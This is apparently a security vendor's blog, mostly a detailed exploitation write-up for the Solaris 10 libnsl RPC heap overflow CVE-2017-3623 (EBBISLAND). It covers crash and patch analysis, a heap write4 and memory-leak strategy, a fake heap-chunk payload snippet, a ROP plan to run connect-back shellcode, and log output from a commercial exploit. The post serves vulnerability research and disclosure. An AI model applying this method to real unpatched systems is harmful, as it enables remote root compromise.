Tuesday, November 13, 2018

Recent kernel memory disclosure bugs in CANVAS

In July 2017, a blogpost from Anders Fogh introduced the idea of leaking kernel memory from the unprivileged userland. This was later followed by the public introduction of both Spectre and Meltdown and their corresponding coverage in the media. For Immunity this was the perfect opportunity to not only write two Spectre exploits for CANVAS (the Windows version being CEU only) but also a framework dedicated to this vulnerability class. In particular we also wrote CANVAS exploits for CVE-2017-18344 and CVE-2018-14656 . Some of our exploitation notes have been published on the Immunity website:

Part 1: https://www.immunityinc.com/downloads/Kernel-Memory-Disclosure-and-Canvas_Part_1.pdf
Part 2: https://www.immunityinc.com/downloads/Kernel-Memory-Disclosure-and-Canvas_Part_2.pdf

Monday, July 10, 2017

A few notes about the exploitation of  CVE-2017-3623 (aka EBBISLAND) on Solaris 10 (x86/amd64)

The advisory CVE-2017-3623 [CVE] is associated with the infamous EBBISLAND exploit that was leaked as part of the Equation Group collection [EQGROUP]. The corresponding heap overflow vulnerability can be exploited to provide a remote root shell to the attacker. What makes it especially interesting is that:
  • The vulnerability was confirmed in Solaris 6 to 9 (by @hackerfantastic [HFANT]). We also confirm that Solaris 10 (up to u10) is also vulnerable.
  • It is not a bug within a specific service but rather within a library (libnsl.so) that is linked to most of the RPC services (more on that later). The implication is that there is not a single entry point but many.
Long story short, an unpatched Solaris exposing at least one of its RPC services can be compromised. It is just a matter of having a supported target. This is one of the most interesting bugs affecting Solaris that we know of. The u11 version of Solaris 10 which was released in 2013 fixed the bug which means that Oracle’s engineers were aware of it yet chose not to disclose it (or were told not to). Instead they advertised perhaps more relevant security features :).


Illustration 1: http://docs.oracle.com/cd/E26505_01/html/E27003/index.html

We could not find any mention of the patch within the release notes. Was the bug found by the Equation Group during a diff session? Who knows.

In this paper, we discuss the exploitation of the vulnerability on Solaris 10 (Intel only). The exploitation on previous versions is assumed to be easy and will not be discussed. We quickly reversed the EQGRP binary EBBISLAND [EBB] to trigger the vulnerability. The read of [F1] and [F2] seemed to confirm at the time that EBBISLAND was mostly target based but we could be proven wrong as we did not reverse the ebbshave.vX binaries. For this reason and because we focused our efforts on Solaris 10 which is more difficult to exploit than version 9 and earlier, we developed our own exploitation strategy which is presented here. It is of course possible that smarter strategies exist.

1. The vulnerability analysis

This vulnerability is (officially) said to affect the kernel RPC subsystem as illustrated by both [CVE] and [ORACLE]. Is that really the case though?

Discrediting the kernel hypothesis

The Solaris rpc subsystem is running both within the kernel (rpcmod, rpcsec modules) and in userland (/lib/libnsl.so.1). Both implementations are using very similar code therefore a memory corruption bug could potentially affect both components. In order to find out, it is enough to use the original leaked binary and observe its effect on a vulnerable target.
No matter the options chosen on the CLI, the EBBISLAND [EBB] exploit generates a single frame with a very specific structure. In particular the credentials structure has its "flavor" (this is the name of this field) set to 0x55de (AUTH_LOOPBACK). This identifies the authentication subsystem and XDR encoded data follows as its parameters. It is clear from the observation of the packet that the bug is related to the authentication subsystem.

The coredump analysis

Replaying a modified packet targeting bootparams, allows us to trigger a userland crash (in this case in rpc.metamhd rather than bootparams):


bash-3.00# /opt/csw/bin/gdb /usr/sbin/rpc.metamhd core
GNU gdb (GDB) 7.7
[...]
Reading symbols from /usr/sbin/rpc.metamhd...(no debugging symbols found)...done .
[New LWP 1]
[New LWP 2]
[Thread debugging using libthread_db enabled]
[New Thread 1 (LWP 1)]
[New Thread 2 (LWP 2)]
Core was generated by `/usr/sbin/rpc.metamhd'.
Program terminated with signal SIGSEGV, Segmentation fault.
#0 0xd0efe2cc in xdr_replymsg () from /lib/libnsl.so.1
(gdb) bt
#0 0xd0efe2cc in xdr_replymsg () from /lib/libnsl.so.1
#1 0xd0f0c09e in svc_vc_reply () from /lib/libnsl.so.1
#2 0xd0f03c47 in svcerr_noprog () from /lib/libnsl.so.1
#3 0xd0f040fa in _svc_prog_dispatch () from /lib/libnsl.so.1
#4 0xd0f08bfc in _svc_run_mt () from /lib/libnsl.so.1
#5 0xd0f08473 in svc_run () from /lib/libnsl.so.1
#6 0x08057094 in main ()
(gdb) print /x $ecx
$1 = 0x450685ec <-- 0x450685ec was read from the network buffer
(gdb) x/6i $pc
=> 0xd0efe2cc <xdr_replymsg+75>: mov 0x18(%ecx),%ecx <-- control of %ecx
is possible
0xd0efe2cf <xdr_replymsg+78>: add $0x18,%eax
0xd0efe2d2 <xdr_replymsg+81>: push %eax
0xd0efe2d3 <xdr_replymsg+82>: push %edi
0xd0efe2d4 <xdr_replymsg+83>: call *%ecx <-- If %ecx can be
controlled, %EIP
can be set.
0xd0efe2d6 <xdr_replymsg+85>: add $0x8,%esp
(gdb)

The payload reliably triggers it. Thanks to the core dump analysis it is possible to see that:
  • The crash occurs within “libnsl.so.1”.
  • The memory corruption is heap based.
  • This specific crash is reliable and almost always the same (%ecx dereference) from which we get an instant EIP control.

Note:
  • The exact same crash is obtained when targeting several (but not all) other processes. This seems to confirm that contrary to the official statement, the “ebbisland” bug is a userland one affecting libnsl.so.1. It is possible that there is (or was) a “similar” kernel bug but it is not what is currently exploited by the leaked binary.
  • On approximately 1/20 attempts, the crash occurs in a different place. We can assume that this is due to small (unexpected) heap variations.
  • On Solaris 9 and below there is no NX bit (and no ASLR) therefore achieving code execution from this point is trivial.

The source code analysis

The vulnerability itself is a heap overflow in __svcauth_loopback(). When an rpc call is performed, a tag (the so-called "flavor" in the credentials struct) is used to select an authentication subsystem. If the value 0x55de0000 is used then the “loopback” authentication is selected.

RPC services are constantly polling for new RPC messages. When one is received, the svc_getreq_common() function is called over a specific file descriptor. This function then retrieves the corresponding SVCXPRT object associated with that descriptor and two of its attributes: "msg" and "r", calling _svc_prog_dispatch() in the process.

_svc_prog_dispatch() may perform an authentication and calls __gss_authenticate() with "r" and "msg" to do so.

Depending on the flavor which is extracted from the network buffer the function calls the corresponding authentication subsystem. When the authentication flavor is AUTH_LOOPBACK (0x55de0000), the function calls __svcauth_loopback().

__svcauth_loopback() essentially starts by extracting data out of the network buffer by using the XDR decoding API. An array of GID may be provided by the attacker within the frame. To avoid buffer overflows, the number of GIDs that a user may provide is limited to NGRPS_LOOPBACK (=64) as demonstrated by the following code:


[...]
area = (struct area *)rqst->rq_clntcred;
aup = &area->area_aup;
[...]
gid_len = IXDR_GET_U_INT32(buf); // reads the gid_len (unsigned)
on the network
if (gid_len > NGRPS_LOOPBACK) { // security check
stat = AUTH_BADCRED;
goto done;
}
aup->aup_len = gid_len;
for (i = 0; i < gid_len; i++) {
aup->aup_gids[i] = (gid_t)IXDR_GET_INT32(buf);
}



Therefore at first, there does not seem to be any corruption of any kind. However, the current check is misleading as one may think that the final buffer is able to store up to 64 GIDs when it is ... not! 

While the loop itself is correct, it relies on the assumption that aup is pointing to a buffer big enough to store the entire 'struct area', including one with up to 64 GIDs.

This is however not the case but it is not obvious at first sight as the allocation is performed several functions before:

a) Each SVCXPRT object is created within svc_xprt_alloc()


SVCXPRT *
svc_xprt_alloc(void)
{
[..]
if ((cred_area = malloc(2*MAX_AUTH_BYTES + RQCRED_SIZE)) == NULL)
goto err_exit;
xt->cred_area = cred_area;
[...]
return (xprt);
err_exit:
svc_xprt_free(xprt);
return (NULL);
}

cred_area is a big buffer of size S = 2*MAX_AUTH_BYTES + RQCRED_SIZE bytes
S = 2*400 + 400 = 1200 bytes

b) When data arrives on the socket (for a specific file descriptor), svc_getreq_common() is called

void
svc_getreq_common(const int fd)
{
SVCXPRT *xprt;
enum xprt_stat stat;
struct rpc_msg *msg;
struct svc_req *r;
char *cred_area;

[...]
if ((fd >= nsvc_xports) || (xprt = svc_xports[fd]) == NULL) { // [L1]
(void) rw_unlock(&svc_fd_lock);
return;
}
[...]
r = SVCEXT(xprt)->req; // [L2]
[...]
cred_area = SVCEXT(xprt)->cred_area;
msg->rm_call.cb_cred.oa_base = cred_area;
msg->rm_call.cb_verf.oa_base = &(cred_area[MAX_AUTH_BYTES]);
r->rq_clntcred = &(cred_area[2 * MAX_AUTH_BYTES]); // [L3]

L1: The SVCXPRT object (xprt) is retrieved based on a global array of sockets (svc_xports)
L2: The svc_req object is derived from xprt
L3: r->rq_clntcred is set to &(cred_area[2 * MAX_AUTH_BYTES]) which means that it points to the remaining 400 bytes.



In __svcauth_loopback(), a 'struct area *' pointer is used over rq_clntcred, therefore over the aforementioned 400 bytes buffer. The function copies directly from the network to this buffer. The size of the whole structure (which includes the 64 GID) is:

S = sizeof(authsys_parms) + (MAX_MACHINE_NAME+1) * sizeof(char)
+ NGRPS_LOOPBACK*sizeof(git_t) = (6 * 4) + (255+1)*1 + 64*4 = 536 bytes



This is significantly greater than the 400 allocated hence the (heap) overflow.

How the vulnerability was fixed


Oracle chose to fix this vulnerability by extending the size of cred_area.

This is the disassembly of svc_xprt_alloc() on S10u8 (unpatched version):


.text:00044166 push 24h ; '$' ; size
.text:00044168 call _malloc
.text:0004416D add esp, 4
.text:00044170 test eax, eax
.text:00044172 jz short loc_441A7
.text:00044174 mov [edi+0Ch], eax
.text:00044177 push 4B0h ; size <-- 1200 bytes
.text:0004417C call _malloc
.text:00044181 add esp, 4
.text:00044184 test eax, eax

And we can compare it with the disassembly of svc_xprt_alloc() on S10u11 (patched version):


.text:0004464E push 24h ; '$' ; size
.text:00044650 call _malloc
.text:00044655 add esp, 4
.text:00044658 test eax, eax
.text:0004465A jz short loc_4468F
.text:0004465C mov [edi+0Ch], eax
.text:0004465F push 538h ; size <-- 1336 bytes
.text:00044664 call _malloc
.text:00044669 add esp, 4
.text:0004466C test eax, eax

The buffer used to copy the struct area is now of size 536 bytes which is exactly what was necessary according to our calculation.

2. A few thoughts about the exploitability on Solaris 10




Exploiting a bug on Solaris 10 is much easier than it is on Linux for several very specific reasons:

  • There is no “real” ASLR. Solaris 10 does support the NX bit preventing the execution of code in the data regions (stack, heap, data section, etc) but without any strong ASLR the mechanism is only partially effective as ret2libc payloads can be written for identified targets. 
  • Kind of like service packs in Windows, Solaris has the concept of periodical updates (numbered from u1 to u11) [SOL]. It is clear that some changes can be observed between binaries of different updates yet it is not an absolute rule that a given binary will be recompiled. In particular, some of them (especially among the rpc services) have either not changed at all or not too often from u1 to u10. Two examples of such binaries would be “/usr/sbin/rpc.bootparamd” and “/usr/lib/netsvc/rusers/rpc.rusersd”. This is interesting because for these services a generic ret2libc payload can be written, modulo of course heap and libraries addresses. For other services, assuming an exploit writer who has enough resources (both in time and .iso files), it is still very possible to build a short list of ret2libc (ROP) payloads for each specific services. 
  • The dynamic linker (/lib/ld.so.1) uses “rwx” pages (for unknown reasons). If one can copy his shellcode into these pages it is instant game over. This also means that the ret2libc primitive can be extremely small thus extremely easy to generate. 



(Almost) no ASLR and a small set of binaries makes the exploitation not only possible but relatively simple from a theoretical point of view. Practically speaking though, there are several factors that need to be taken into account: 

  • Depending on both the service that you attack, the update and how the service is managed (svcadm, inetadm, cli, etc.), you may not have an unlimited number of attempts in order to exploit it. In the worse case you may render a service unusable and trigger logs very easy to find (not to mention the corresponding core file): 


bash-3.2# cat /var/adm/messages|grep maintenance
Jun 13 11:42:34 Host-001 svc.startd[8]: [ID 748625 daemon.error] network/rpc/bootparams:default failed repeatedly: transitioned to maintenance (see 'svcs -xv' for details)
Jun 14 08:10:28 Host-002 svc.startd[8]: [ID 748625 daemon.error] network/rpc/bootparams:default failed repeatedly: transitioned to maintenance (see 'svcs -xv' for details)
Jun 14 08:14:08 Host-002 svc.startd[8]: [ID 748625 daemon.error] network/rpc/bootparams:default failed repeatedly: transitioned to maintenance (see 'svcs -xv' for details)
Jun 14 08:34:33 Host-002 svc.startd[8]: [ID 748625 daemon.error] network/rpc/bootparams:default failed repeatedly: transitioned to maintenance (see 'svcs -xv' for details)
bash-3.2# svcs -xv
svc:/application/print/server:default (LP print server)
State: disabled since Wed Jun 14 08:15:58 2017
Reason: Disabled by an administrator.
See: http://sun.com/msg/SMF-8000-05
See: man -M /usr/share/man -s 1M lpsched
Impact: 2 dependent services are not running:
svc:/application/print/rfc1179:default
svc:/application/print/ipp-listener:default

svc:/network/rpc/bootparams:default (boot parameter server)
State: maintenance since Wed Jun 14 08:34:33 2017
Reason: Restarting too quickly.
See: http://sun.com/msg/SMF-8000-L5
See: man -M /usr/share/man -s 1M rpc.bootparamd
See: /var/svc/log/network-rpc-bootparams:default.log
Impact: This service is not running.
bash-3.2#



  • While there is no specific “security” ASLR per say, there is still a “natural” ASLR. The heap may (or should) be different from one update to another. This is essentially because while the main binary of the service does not change (much), the libraries it is linked against actually do. Additionally, two exact same OSs may load libraries at different addresses. Empirical results suggest that there is a natural entropy of maximum 8 bits (probably a lot less in practice). This entropy seems to be a per boot factor which means that for a given boot, two processes (executed from the same binary) will have the same layout. This can easily be seen by comparing the core files produced during crashes: 

bash-3.00# pmap core*|grep ld|grep 160K
D13C4000 160K r-x-- /lib/ld.so.1
D0FC4000 160K r-x-- /lib/ld.so.1
D0FC4000 160K r-x-- /lib/ld.so.1
D13C4000 160K r-x-- /lib/ld.so.1
D0FC4000 160K r-x-- /lib/ld.so.1
D0FC4000 160K r-x-- /lib/ld.so.1
D13C4000 160K r-x-- /lib/ld.so.1

  • Finally depending on “when” you attack the service, the heap might not be in a usable state. Specifically, one-shotting a service that has been used before is probably very difficult. Fortunately, if you can reliably crash it you will be fine as your exploit should be the first to interact with the service and its memory has been reset. Of course if you choose to target some highly used RPC service such as one related to file sharing this may not hold. 
  • The main binary though possibly quite constant across updates will be small in size. This means that the ret2libc payload created using code borrowed from the binary (the so-called gadgets) could be quite limited in functionalities. This ELF binary will always be loaded at 0x08050000. 
  • The architecture of the target is unknown. Interestingly enough whether you run a 32 bits or a 64 bits environment, your service is still 32 bits. That being said, the address space will change depending on the kernel architecture. This is documented in the excellent [CORE]. 


To sum things up, for a given service (bootparams, metad, metamedd, etc.) writing a payload is easy modulo the knowledge of a few parameters (the binary version, the architecture, the update version, the effect of the current boot on the ASLR, etc.). Guessing is certainly possible but the cost is necessarily one crash per attempt (mandatory heap reset) which means at least a dozen of crashes. 

There are of course many ways to reduce this amount quite effectively but since we face services that may stop functioning at some point, this is not acceptable. For these reasons we explored the idea of leaking information out of the process to create (more reliable primitives). We will now detail the strategy deployed for the exploit module released within Canvas 7.14 targeting bootparams.

Note: Exploiting other services require slightly different strategies. We applied some of them to increase the number of targets (especially when bootparams is not available) in the updated version of the module (Canvas 7.15). We won’t discuss this in this blogpost.


3. Information Leaking


The overflow primitive allow us to overwrite adjacent objects which, depending on the heap layout, may include pointers, file descriptors, etc. It is probably possible to generate an information leak this way but that’s composing with several difficulties:

  • the overflow primitive only allows the overwriting of the 4*n next bytes where n is fixed. Since pointer addresses are aligned modulo 4 partial pointer overwrites are not directly doable which means some guessing, the corruption of another object type, etc. 
  • being able to overwrite a specific object requires a heap control ranging from painful to undoable (depending on the allocator, your degree of control, etc.). 

On a modern OS, the allocator is usually heavily protected against trivial chunk’s metadata manipulation which is why exploit writers often favor adjacent object overflow with this kind of primitives. Fortunately this is not the case with Solaris 10 (but may be with Solaris 11?) thus it is doable to transform our adjacent overwrite into a write4 primitive which is, especially when you have a poor ASLR, a much better weapon and saves us a lot of effort.

(a) A few notes about how to achieve the write4


Achieving the write4 is obviously completely dependent on the underlying allocator which, on Solaris 10, is based on self-adjusting binary trees. One can find the main ideas behind in [SABT]. We assume that the reader is already very familiar with the excellent [P57OUAF]. Our write4 primitive is a direct application of the technique described in this paper.


However, for the sake of completeness, let us provide a few additional details:
  • As explained in [P57OUAF], the chunks have fields of type WORD and a WORD is itself a union. The size of this object is controlled by the ALIGN macro which is 8. This is important because it means that most of the fields are 32 bits pointers. Clearly in memory there is a 4 bytes gap (filled with 0) between 2 fields instead of having immediately consecutive pointers. The reason behind such a choice is unclear but it needs to be taken into account during the exploitation attempt as pointed out in [P57OUAF]. I would recommend to read the assembly code instead of the source code.
  • A call to free() does not trigger an actual chunk manipulation. Instead that chunk C is only set in a circular list flist. Later when (or if) enough allocations and deallocations are made, realfree() will be called upon C. If the header of C was corrupted, an unlink-like primitive will be user controlled and a write4 primitive achieved. It is mandatory to understand this point as the write4 is absolutely not synchronous by default! This can however be fixed:
      • The user can initiate a lot of dummy connections on the attacked service and disconnect all of them while keeping one connection alive (for the leak). The idea behind is that free() will be called upon all the corresponding structures. Since the circular list is not so big, this eventually triggers a call to realfree() upon the corrupted chunk.
      • Keeping one connection alive is mandatory to have something interesting to corrupt on the heap. In this case ‘interesting’ means that the structure must be alive (still used by the process).
        Note: The dummy connections have an obvious influence on the heap so every leak primitive will have to take this into account.
  • The unlink() primitive exploited within realfree() will perform two write operations. By design overwriting at address X with DWORD Y is only possible if Y (modulo an offset) is a valid pointer to writable memory. Nothing new here. To avoid problems we use the (universal) address 0x08063000 (.got) when we can, heap & stack addresses otherwise.
  • We do overwrite the size field of the adjacent chunk as proposed in [P57OUAF] however to avoid too much heap corruption, we chose to create a fake chunk before the corrupted one. Since the (overwritten) size field is used as an offset and (without any sanity check), we can set it to a negative value (0xffffffc0 | 1). Below is the fake chunk located a little bit before the overflown chunk:
pattern += struct.pack('>L', 0x200) # t_s +0
pattern += struct.pack('>L', 0)
pattern += struct.pack('>L', self.where) # t_p +8
pattern += struct.pack('>L', 0)
pattern += struct.pack('>L', 0xffffffff) # t_l +16
pattern += struct.pack('>L', 0)
pattern += struct.pack('>L', 0) # t_r +24
pattern += struct.pack('>L', 0)
pattern += struct.pack('>L', self.what) # t_n +32 # Must be writable!
pattern += struct.pack('>L', 0)


(b) Transforming the write4 into an information leak


If the attacker sends a non crashing payload on the bootparams service, an answer of 36 bytes is sent in return. Analyzing libnsl, one can easily see that the function xdr_replymsg() is called when the authentication fails and sends the aforementioned packet. Interestingly enough, building the RPC answer and sending it is fairly complex structures acting as pseudo classes and their methods are involved. In particular, one can make the following observations:

  • For each connection to the service, two RECSTREAM objects are built, one dealing with the reception of the query and the other one dealing with the emission of the answer. 
  • The prototype of this object can be found in the source code of opensolaris [OPENSOL] and, practically speaking, seems to match the assembly code of the actual binaries. The prototype of this object is the following:
typedef struct rec_strm {
caddr_t tcp_handle;
[...]
int (*writeit)();
caddr_t out_base; /* output buffer (points to frag header) */
caddr_t out_finger; /* next output position */
caddr_t out_boundry; /* data cannot up to this address */
uint32_t *frag_header; /* beginning of current fragment */
bool_t frag_sent; /* true if buffer sent in middle of record */
[...]
int (*readit)();
caddr_t in_base; /* input buffer */
caddr_t in_finger; /* location of next byte to be had */
caddr_t in_boundry; /* can read up to this location */
int fbtbc; /* fragment bytes to be consumed */
bool_t last_frag;
uint_t sendsize;
uint_t recvsize;
[...]
uint_t firsttime;
[...]
uint_t in_nonblock; /* non-blocked input */
uint_t in_needpoll; /* need to poll to get more data ? */
uint32_t in_maxrecsz; /* maximum record size */
caddr_t in_nextrec; /* start of next record */
uint32_t in_nextrecsz; /* part of next record in buffer */
} RECSTREAM;

This object keeps track of several pointers including one locating the buffer to be sent (out_base) when the writeit() method is called.

Based on this information, it seems very easy to leak any kind of memory. One creates a dummy connection and hangs. Doing so, the two RECSTREAM objects associated with this connection will be created and populated. The exploit connection triggers the write4 and overwrites the out_base of the dummy’s RECSTREAM (emission) with the address of the area to be leaked. The dummy client then sends its payload. This triggers an answer. Instead of receiving the expected answer, the client receives the memory content starting at the overwritten out_base. By repeating the operation a number of times, the client can get as much information as required modulo his knowledge of the target’s address space. This primitive has a number of limitations:

  • The location of the RECSTREAM (heap) object is mandatory. The ASLR is not affecting the heap layout but the stack (therefore the environment, the process’s arguments, etc) as well as the update level do. As such one can estimate roughly the location of this structure but can rarely locate it immediately. One can however make a few observations to improve the research: 
    • Overwriting out_base or out_finger which are adjacent triggers a leak. As such, it is possible to bruteforce the address modulo 8 which speeds up a lot the research. It should be noted that overwriting out_finger triggers a “smaller” leak (the packet is shorter than 36 bytes) which allows to distinguish one case from the other one when the leak is detected. This gives us the exact address of the RECSTREAM object. 
    • One can observe that for a given service, there is an empirical difference of around 0x200 bytes on average between two RECSTREAM addresses for two consecutive update levels. The immediate consequence is that for a given service, the RECSTREAM structure can be searched within a rather small range. Our exploit includes 3 strategies based on this observation to location the structure (one fast, one reasonably fast and a slow one). 
  • While the leak primitive seems perfect at first, it is much more limited than anticipated. In particular not all the regions can be leaked because of the internal checks related to out_base (cf. xdrrec_endofrecord()).



For this reason, we decided to create a second much less limited leak primitive. To achieve such a result, we observe that:

  • A unique RECSTREAM reference is stored within an XDR object whose location is empirically very close to that of the RECSTREAM object. Changing the pointer within the XDR can be done using the write4 primitive we talked about. 
  • The first leak primitive allows us to leak the content of the original RECSTREAM object itself. This is important as the exploit can then create a perfect copy of this structure. 
  • A fake RECSTREAM object could be stored within one of our network packets and its location found using the first leak. 


In a nutshell, based on these three observations we devise the following strategy: we locate the XDR structure corresponding to the RECSTREAM to replace the corresponding pointer with one pointing on a fake structure at a user controlled location. This fake RECSTREAM object can be crafted as precisely as required. With this alternate primitive one can easily extend the range of what is leakable and in particular locate and leak the stack among other things.

Note: The CODE segment of binaries can not be leaked using this primitive as it requires a write in the target memory that is read which is obviously impossible on these memory regions (see the flush_out() function and especially the frag_header parameter).

4. A few words about leaking the stack


Leaking the stack is very important in order to stabilize the exploit:


  • Most of the stack frames can be recovered which is especially important being given the fact that the location of saved frame pointers can be deduced (more on that later). 
  • Several heap object locations are leaked. This (eventually) allows more creativity in the exploitation process. We do not use this though. 
  • The entire environment is retrieved, in particular the AUXV array which leaks interesting parameters as shown below (“usr/src/uts/common/sys/auxv.h”):
#define AT_SUN_UID 2000 /* effective user id */
#define AT_SUN_RUID 2001 /* real user id */
#define AT_SUN_GID 2002 /* effective group id */
#define AT_SUN_RGID 2003 /* real group id */
[...]
#define AT_SUN_LDELF 2004 /* dynamic linker's ELF header */
#define AT_SUN_LDSHDR 2005 /* dynamic linker's section headers */
#define AT_SUN_LDNAME 2006 /* name of dynamic linker */
#define AT_SUN_LPAGESZ 2007 /* large pagesize */
[…]
#define AT_SUN_MMU 2015 /* mmu module name */
#define AT_SUN_LDDATA 2016 /* dynamic linkers data segment */

Long story short, one can leak the address of a memory region that is always writable and executable thus an excellent candidate to hold a shellcode.

Bonus: Leaking the stack also allows to retrieve important addresses from the main binary. There are theoretical implications but since the bootparams binary has not changed from u2 (and possibly u1) to u10, there is no practical interest.

5. Putting everything together


Before detailing the algorithm of the exploit we must explain something else. We observed that on u10 (and u10 only) crashing the bootparams service more than 4 times in a row would ultimately lead to the service being put into “maintenance mode”. This change of state is logged in the process. The troublesome consequence is that the bootparams service is no more accessible for more exploitation attempts. It is instant game over (at least with bootparams).

It is unknown if waiting long enough would solve this situation but it would also make our exploitation too slow for practical needs. Instead and because only u10 is an annoying case we use the following strategy: no matter what happens, we use static parameters against u10 to one-shot it. We attempt the u10 exploitation before even trying to set our leak primitive in order to reduce the amount of crashes. 

If the target is indeed u10, chances are good to get a shell this way. If it is not, this won’t have any negative consequences anyway because the process will respawn (almost) indefinitely. The leak_and_pwn method should thus grant us a shell.

The leak_and_pwn method of the exploit works for u2 up to u9 (x86/amd64) and follows this algorithm: 

  1. The exploit attempts to leak the address of a RECSTREAM structure associated with a leaking process. It uses several strategies to do so including known addresses and empirical ranges.
  2. The corresponding RECSTREAM content is leaked and a fake structure is prepared.
  3. The XDR object holding the reference to the aforementioned RECSTREAM object is leaked. 
  4. The exploit attempts to locate its network packets stored on the heap. 
  5. The exploit now uses a second leak primitive based on a fake RECSTREAM to leak the content of the stack. 
  6. The exploit now uses its knowledge of the stack frames to corrupt a saved frame pointer using the write4. This has the effect to redirect the control flow to a ret2libc payload with full control of the EBP. The first “gadget” executed is a function epilogue in order to control the stack pointer.
  7. 80760ae: 8b e5 mov %ebp,%esp ; stack is controlled
    80760b0: 5d pop %ebp ; therefore the next
    80760b1: c3 ret ; pop are controlled.

Note: The corruption of the stack is a nice way to achieve true stack control. When we ran the ebbisland exploit we observed that it was trying to one-shot the process by controlling xdr_inline(). There is no doubt that the PC is controlled and on solaris 9 and earlier, this method works. However on Solaris 10 you need ROP thus the control of the stack which you don’t have by default with a heap overflow. The problem is that finding the “gadget” to do so is hard because the main binary is small as said earlier (thus gadget poor). Additionally the other libraries are loaded at, a priori, unknown locations and their .text section cannot be leaked (due to the write condition mentioned before).

         7. Since the stack pointer is controlled, gadgets can be chained and:
      1. A call to memcpy() (or equivalent) is performed to copy the shellcode stored within the network packet into the data section of the dynamic loader (this section is +rwx). 
      2. The gadget returns into the shellcode and a connect back is executed. 



This is an example of output from the CANVAS exploit:
2017-06-26 17:50:36,532 [ exploitutils.py] - INFO - Discovered interfaces:
2017-06-26 17:50:36,532 [ exploitutils.py] - INFO - - ['lo', '127.0.0.1', '255.0.0.0']
2017-06-26 17:50:36,532 [ exploitutils.py] - INFO - - ['enp0s3-ipv6', 'fe80::61:853c:fa1b:3af6:76', 'ffff:ffff:ffff:ffff::']
[...]
2017-06-26 17:50:36,657 [ solaris_rpc_libnsl_ng2.py] - INFO - OS detected: Solaris ['10', '11']
2017-06-26 17:50:36,657 [ solaris_rpc_libnsl_ng2.py] - INFO - >>> Method #1: Attempting to exploit bootparam
2017-06-26 17:50:36,657 [ solaris_rpc_libnsl_ng2.py] - INFO - [+] Checking if bootparam is available
2017-06-26 17:50:36,663 [ solaris_rpc_libnsl_ng2.py] - INFO - -> OK
2017-06-26 17:50:36,664 [ solaris_rpc_libnsl_ng2.py] - INFO - [+] Expecting an u10 version
2017-06-26 17:50:36,664 [ solaris_rpc_libnsl_ng2.py] - INFO - -> Testing x86 target
2017-06-26 17:50:37,430 [ solaris_rpc_libnsl_ng2.py] - INFO - Waiting 2.00 sec
2017-06-26 17:50:40,540 [ solaris_rpc_libnsl_ng2.py] - INFO - -> Testing amd64 target
2017-06-26 17:50:41,259 [ solaris_rpc_libnsl_ng2.py] - INFO - Waiting 2.00 sec
2017-06-26 17:50:44,370 [ solaris_rpc_libnsl_ng2.py] - INFO - [+] Starting the generic attack
2017-06-26 17:50:44,371 [ solaris_rpc_libnsl_ng2.py] - INFO - [+] Trying to find the "leaky"'s RECSTREAM object
2017-06-26 17:50:44,371 [ solaris_rpc_libnsl_ng2.py] - INFO - -> Trying the ultra-fast range
2017-06-26 17:50:46,362 [ solaris_rpc_libnsl_ng2.py] - INFO - [+] RECSTREAM object is at: 0x080ae080
2017-06-26 17:50:48,352 [ solaris_rpc_libnsl_ng2.py] - INFO - recstream.tcp_handle = 0x080ad8b0
2017-06-26 17:50:48,354 [ solaris_rpc_libnsl_ng2.py] - INFO - recstream.writeit = 0xfef3bdf4
2017-06-26 17:50:48,355 [ solaris_rpc_libnsl_ng2.py] - INFO - recstream.out_base = 0x080ae000
2017-06-26 17:50:48,355 [ solaris_rpc_libnsl_ng2.py] - INFO - recstream.out_finger = 0x080ae104
2017-06-26 17:50:48,356 [ solaris_rpc_libnsl_ng2.py] - INFO - recstream.out_boundry = 0x080b0408
2017-06-26 17:50:48,357 [ solaris_rpc_libnsl_ng2.py] - INFO - recstream.frag_header = 0x080ae0e0
2017-06-26 17:50:48,357 [ solaris_rpc_libnsl_ng2.py] - INFO - recstream.frag_sent = 0
2017-06-26 17:50:48,358 [ solaris_rpc_libnsl_ng2.py] - INFO - recstream.readit = 0x00000000
2017-06-26 17:50:48,358 [ solaris_rpc_libnsl_ng2.py] - INFO - recstream.in_base = 0x080b0410
2017-06-26 17:50:48,359 [ solaris_rpc_libnsl_ng2.py] - INFO - recstream.in_finger = 0x080b13b0
2017-06-26 17:50:48,359 [ solaris_rpc_libnsl_ng2.py] - INFO - recstream.in_boundry = 0x080b13b0
2017-06-26 17:50:48,359 [ solaris_rpc_libnsl_ng2.py] - INFO - recstream.fbtbc = 0
2017-06-26 17:50:48,359 [ solaris_rpc_libnsl_ng2.py] - INFO - recstream.last_frag = 1
2017-06-26 17:50:48,360 [ solaris_rpc_libnsl_ng2.py] - INFO - recstream.sendsize = 9000 [0x00002328]
2017-06-26 17:50:48,360 [ solaris_rpc_libnsl_ng2.py] - INFO - recstream.recvsize = 4000 [0x00000fa0]
2017-06-26 17:50:48,360 [ solaris_rpc_libnsl_ng2.py] - INFO - recstream.firsttime = 0
2017-06-26 17:50:48,360 [ solaris_rpc_libnsl_ng2.py] - INFO - recstream.in_nonblock = 0
2017-06-26 17:50:48,360 [ solaris_rpc_libnsl_ng2.py] - INFO - recstream.in_needpoll = 1
2017-06-26 17:50:48,361 [ solaris_rpc_libnsl_ng2.py] - INFO - recstream.in_maxrecsz = 0
2017-06-26 17:50:48,361 [ solaris_rpc_libnsl_ng2.py] - INFO - recstream.in_nextrec = 0x080b0410
2017-06-26 17:50:48,361 [ solaris_rpc_libnsl_ng2.py] - INFO - recstream.in_nextrecsz = 0
2017-06-26 17:50:48,361 [ solaris_rpc_libnsl_ng2.py] - INFO - [+] Trying to find the associated 'XDR' object and the place to store a fake RECSTREAM
2017-06-26 17:50:50,361 [ solaris_rpc_libnsl_ng2.py] - INFO - -> Found the XDR object at 0x080adec4:
2017-06-26 17:50:50,362 [ solaris_rpc_libnsl_ng2.py] - INFO - xdrs.x_op = 0
2017-06-26 17:50:50,363 [ solaris_rpc_libnsl_ng2.py] - INFO - xdrs.x_ops = 0xfef88998
2017-06-26 17:50:50,364 [ solaris_rpc_libnsl_ng2.py] - INFO - xdrs.x_public = 0x00000000
2017-06-26 17:50:50,364 [ solaris_rpc_libnsl_ng2.py] - INFO - xdrs.x_private = 0x080ae080 [RECSTREAM object]
2017-06-26 17:50:50,365 [ solaris_rpc_libnsl_ng2.py] - INFO - xdrs.x_base = 0x00000000
2017-06-26 17:50:50,365 [ solaris_rpc_libnsl_ng2.py] - INFO - xdrs.x_handy = 0
2017-06-26 17:50:50,365 [ solaris_rpc_libnsl_ng2.py] - INFO - -> Found the perfect place to store our fake RECSTREAM: 0x080ada00
